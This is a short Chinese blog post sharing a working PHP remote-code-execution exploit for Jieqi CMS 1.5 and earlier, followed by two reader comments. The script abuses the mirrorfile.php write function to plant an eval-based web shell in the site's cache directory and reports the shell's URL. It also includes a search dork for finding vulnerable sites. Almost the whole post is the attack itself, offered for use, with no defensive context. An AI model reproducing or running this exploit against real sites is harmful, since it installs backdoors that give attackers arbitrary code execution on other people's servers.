Jieqi cms v1.5 remote code execution exploit

作者:flyh4t

http://bbs.wolvez.org

转个exp出来迎接新年

<?php
print_r('
+---------------------------------------------------------------------------+
Jieqi cms <= 1.5 remote code execution exploit
by Flyh4t
mail: [email protected]
team: http://www.wolvez.org
dork: "技术支持:杰奇网络"
+---------------------------------------------------------------------------+
');
/**
* works regardless of php.ini settings
*/
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------------------+
Usage: php '.$argv[0].' host path
host:      target server (ip/hostname)
path:      path to jieqi cms
Example:
php '.$argv[0].' localhost /
+---------------------------------------------------------------------------+
');
    exit;
}
error_reporting(7);
ini_set('max_execution_time', 0);
$host = $argv[1];
$path = $argv[2];
$url = 'http://'.$host.$path.'mirrorfile.php?filename=cache/flyh4t.php&action=writetofile&content=';
$shell = 'http://'.$host.$path.'cache/flyh4t.php';
$cmd = urlencode("<?php @eval(\$_POST[wolvez]);?>test");
$str = file_get_contents($url.$cmd);
if ( file_get_contents($shell) == 'test')
exit("Expoilt Success!\nView Your shell:\t$shell\n");
else
exit("Exploit Failed!\n");
?>

相关日志

楼被抢了 2 层了... 抢座Rss 2.0或者 Trackback

  • xxxxx

    现在这类的东西已经显的很无聊了.
    能否找的出漏洞,最后比的也就是谁比较信息或谁的
    “Fuzz”工具比较牛B了.
    能够挖出新的漏洞手法才是以后的趋势.

  • gulang

    exp 怎么用啊,请教下,谢谢!

发表评论